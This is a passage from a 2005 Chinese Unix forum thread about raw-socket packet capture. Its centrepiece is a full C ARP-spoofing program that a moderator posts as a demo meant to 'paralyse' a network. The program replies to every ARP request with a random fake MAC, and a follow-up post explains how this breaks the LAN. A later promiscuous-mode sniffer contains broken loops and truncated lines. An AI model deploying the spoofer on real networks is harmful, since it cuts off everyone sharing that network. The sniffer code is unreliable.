
平台论坛博客文库

论坛徽章:: 0

31楼 [报告]

发表于 2005-01-10 14:42 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

我看到的是已经改好的了，
指针已经移动了 ptemp += sizeof(struct iphdr);
所以我在比 ip ->; tot_len 和 ntohs(pudp->;len)

另外，对不起，我不知道这里为什么要用 strcpy

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

myhstone

白手起家

论坛徽章:: 0

32楼 [报告]

发表于 2005-01-10 15:17 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

要命，编译完后运行得眼都花了，
linux机器差点死掉。。。。

Yufei00772002

稍有积蓄

论坛徽章:: 0

33楼 [报告]

发表于 2005-01-10 15:43 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

不好意思，我是昨天才学习这个网络程序，但是我们都好像是新手，我愿意回答这个问题，
因为 for(;

是个无限循环，应该是只要你的网卡是active的状态，就不断读上面的信息，fetch出来。
我感觉死机不至于，你可以定向到一个文件，然后CTRL+C

-- 感觉这里真专业，大家都是real practices.

playmud

丰衣足食

论坛徽章:: 0

34楼 [报告]

发表于 2005-01-10 19:19 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

好啊，大家表现都很好！真的。

JohnBull

版主

论坛徽章:: 0

35楼 [报告]

发表于 2005-01-10 23:20 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

真热闹啊!

我也凑凑!
这是我讲课时的示范程序,让你的网络瘫痪,make一下就行了.

/*
*
* This is a simple arp spoof program.
* It demostrates the usage of PACKET socket.
* the code is published under GPL.
* see http://www.gnu.org for the detail of GPL.
* written by
* John Bull <john@ccjsj.com>;
*/
#include <stdio.h>;
#include <unistd.h>;
#include <signal.h>;
#include <fcntl.h>;
#include <sys/socket.h>;
#include <features.h>;
#include <netpacket/packet.h>;
#include <net/ethernet.h>;
#include <sys/ioctl.h>;
#include <sys/types.h>;
#include <net/if.h>;
#include <net/if_packet.h>;
#include <net/if_arp.h>;
struct etharp {
struct arphdr hdr;
unsigned char sender_mac[6];
unsigned char sender_ip[4];
unsigned char rcver_mac[6];
unsigned char rcver_ip[4];
};
struct etharp_frame {
unsigned char dst[6];
unsigned char src[6];
unsigned short type;
struct etharp arp;
};
char*
mac2a(char* dst, unsigned char* addr)
{
int i;
char buf[8];
dst[0]='\0';
for (i=0;i<6;i++) {
sprintf(buf,"%.2X",(unsigned char)addr[i]);
strcat(dst,buf);
if (i<5) {
strcat(dst,":");
}
}
return dst;
}
char*
ip2a(char* dst, unsigned char* addr)
{
int i;
char buf[8];
dst[0]='\0';
for (i=0;i<4;i++) {
sprintf(buf,"%u",(unsigned char)addr[i]);
strcat(dst,buf);
if (i<3) {
strcat(dst,".");
}
}
}
int
getIndexbyName(int sd, const char* ifname)
{
int ret;
struct ifreq req;
strncpy(req.ifr_name,ifname,IFNAMSIZ);
ret=ioctl(sd,SIOCGIFINDEX,&req);
if (ret==-1) {
return -1;
}
return req.ifr_ifindex;
}
void
usage(char* argv0)
{
printf("usage: %s -i ifname -m\n",argv0);
}
main(int argc, char *argv[])
{
int sd,fd;
int ret;
int iface;
struct sockaddr_ll my_end,his_end;
int his_end_len;
struct etharp_frame rcvBuffer[1],sndBuffer[1];
char mac[18],ip[16];
unsigned char fake[6];
if (argc<2) {
usage(argv[0]);
exit(0);
}
int c;
char iface_name[IFNAMSIZ];
int monitor_mode=0;
strcpy(iface_name,"eth0");
while ((c=getopt(argc,argv,"i:m"))>;=0) {
switch (c) {
case 'i' :
strncpy(iface_name,optarg,IFNAMSIZ);
break;
case 'm' :
monitor_mode=1;
break;
default :
usage(argv[0]);
exit(0);
break;
}
}
printf("This program keeps running for 60 seconds.\n");
printf("NIC=%s\n",iface_name);
printf("Monitor Mode=%i\n",monitor_mode);
printf("=========\n");
alarm(60);
sd=socket(PF_PACKET,SOCK_RAW,htons(ETH_P_ARP));
if (sd==-1) {
perror("socket");
exit(1);
}
iface=getIndexbyName(sd,iface_name);
if (iface==-1) {
perror("ioctl(Request interface index)");
exit(-1);
}
my_end.sll_family=AF_PACKET;
my_end.sll_protocol=htons(ETH_P_ARP);
my_end.sll_ifindex=iface;
ret=bind(sd,(struct sockaddr*)&my_end,sizeof(struct sockaddr_ll));
if (ret==-1) {
perror("bind");
exit(1);
}
fd=open("/dev/urandom",O_RDONLY);
while (1) {
ret=recvfrom(sd,rcvBuffer,sizeof(rcvBuffer),0,(struct sockaddr*)&his_end,&his_end_len);
if (ret==-1) {
continue;
}
if (ntohs(rcvBuffer->;arp.hdr.ar_op)==ARPOP_REQUEST) {
ip2a(ip,rcvBuffer->;arp.sender_ip);
printf("%s wants to know ",ip);
ip2a(ip,rcvBuffer->;arp.rcver_ip);
printf("%s's MAC.\n",ip);
fflush(stdout);
if (monitor_mode==1)
continue;
read(fd,fake,6);
memcpy(sndBuffer->;dst,rcvBuffer->;arp.sender_mac,6);
memcpy(sndBuffer->;src,fake,6);
sndBuffer->;type=htons(ETH_P_ARP);
sndBuffer->;arp.hdr.ar_hrd=htons(ARPHRD_ETHER);
sndBuffer->;arp.hdr.ar_pro=htons(0x0800);
sndBuffer->;arp.hdr.ar_hln=(char)6;
sndBuffer->;arp.hdr.ar_pln=(char)4;
sndBuffer->;arp.hdr.ar_op=htons(ARPOP_REPLY);
memcpy(sndBuffer->;arp.sender_mac,fake,6);
memcpy(sndBuffer->;arp.sender_ip,rcvBuffer->;arp.rcver_ip,4);
memcpy(sndBuffer->;arp.rcver_mac,rcvBuffer->;arp.sender_mac,6);
memcpy(sndBuffer->;arp.rcver_ip,rcvBuffer->;arp.rcver_ip,4);
his_end.sll_family=AF_PACKET;
// his_end.sll_addr should be filled by recvfrom() already
his_end.sll_halen=6;
his_end.sll_ifindex=iface;
sleep(1);
sendto(sd,sndBuffer,sizeof(sndBuffer),0,(struct sockaddr*)&his_end,sizeof(his_end));
mac2a(mac,fake);
printf("\tfaked a %s as the answer.\n",mac);
}
}
close(fd);
}

复制代码

黄山松

白手起家

论坛徽章:: 0

36楼 [报告]

发表于 2005-01-11 10:39 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

呵呵,教人学坏啊

好,我来配个讲解:
本程序的作用是起到ARP欺骗.首先说一下ARP的作用:
ARP的作用是获取目的IP机器的MAC地址,然后在根据这个MAC地址和IP地址和目标机器进行信息交互,有一点比较重要的就是每个机器在正常工作的情况下只会接受MAC地址是广播地址和MAC地址是自己MAC地址的网络包.
所以加入机器A想和机器B通信,过程如下:

1.A发一个ARP包(这是广播包,谁都可以收到),想去获取机器B的MAC
2.机器B接收到该ARP包并确人是给自己的,返回一个ARP包,告诉A他的MAC
3.A根据获取的MAC进行网络交互

本程序的作用是:
接收到任何一个机器发出来的ARP请求包,立马回一个ARP返回包,里面返回的MAC地址是随机的(够狠

,这样网络里的MAC地址和IP地址对应关系就会乱掉了,这样整个网络的数据交互就瘫痪了,哈哈

Yufei00772002

稍有积蓄

论坛徽章:: 0

37楼 [报告]

发表于 2005-01-11 11:09 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

这个程序写的蛮好的（当然我是写不出来的），知识点挺多的，总体感觉是收到的数据包，又送回去了。
学习啊... ...

对不起，我没有看到 - 黄山松的回帖
返回的Mac地址是从一个文件里读出来的，这个文件有随机性？
不知道说的对不对

RealRaul

白手起家

论坛徽章:: 0

38楼 [报告]

发表于 2005-01-21 13:10 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

cc -o netdump netdump.c
"/usr/include/sys/netinet/ip.h", line 175: error: Syntax error before or at: n_long
"/usr/include/sys/netinet/ip.h", line 175: error: cannot recover from previous errors

lifeixiao

白手起家

论坛徽章:: 0

39楼 [报告]

发表于 2005-01-28 10:32 |只看该作者

给出一个 netdump 程序, 抓包用的. 如果改进了,也希望贴出

//netdump.c

#include <stdio.h>;
#include <sys/socket.h>;
#include <netinet/in.h>;
#include <arpa/inet.h>;
#include <netinet/ip.h>;
#include <string.h>;
#include <netdb.h>;
#include <netinet/tcp.h>;
#include <stdlib.h>;
#include <unistd.h>;
#include <signal.h>;
#include <net/if.h>;
#include <sys/ioctl.h>;
#include <sys/stat.h>;
#include <fcntl.h>;
#include <termios.h>;

void die(char *why, int n)
{
    perror(why);
    exit(n);
}

int do_promisc(char *nif, int sock )
{
struct ifreq ifr;

    strncpy(ifr.ifr_name, nif,strlen(nif)+1);
    if((ioctl(sock, SIOCGIFFLAGS, &ifr) == -1))
    {
die("ioctl", 2);
    }
    ifr.ifr_ifru.ifru_flags |= IFF_PROMISC;
    if(ioctl(sock, SIOCSIFFLAGS, &ifr) == -1 )
    {
die("ioctl", 3);
    }
}

char buf[3*32767];

main()
{
struct sockaddr_in addr;
struct ip *ip;
struct tcphdr *tcp;
int sock, r, len,i;
char *data ,*ptr;
char ss[32], dd[32];
int size;

if((sock = socket(AF_INET,SOCK_RAW,0)) == -1) die("socket", 1);
do_promisc("tu0", sock);


for(;

{
len = sizeof(addr);

r = recvfrom(sock,(char *)buf,sizeof(buf),0,(struct sockaddr *)&addr,&len);
buf[r] = 0;

ip = (struct ip *)buf;
for(i=0,ptr=buf;i<2*32767;ptr++);
tcp = (struct tcphdr *)ptr;

printf("

ktSize: %d IPLEN %d PROT %d  \
      %s:%d-->;%s:%d %d \n",
         r, ip->;ip_len, ip->;ip_p,

   strcpy(ss, inet_ntoa(*(struct in_addr*)&(ip->;ip_src.s_addr))),
   ntohs(tcp->;th_sport),
   strcpy(dd, inet_ntoa(*(struct in_addr*)&(ip->;ip_dst.s_addr))),
   ntohs(tcp->;th_dport),
   tcp->;th_off );
        data = (char*)tcp + 4*tcp->;th_off;
        printf("data = %s\n", data);
   }
}

================
我把楼主的程序改了一下放在Digital UNIX下运行，程序一直阻塞在recvfrom处，这是为什么？我另外写了测试程序从另外一台机上往本机上不停的发数据啊明明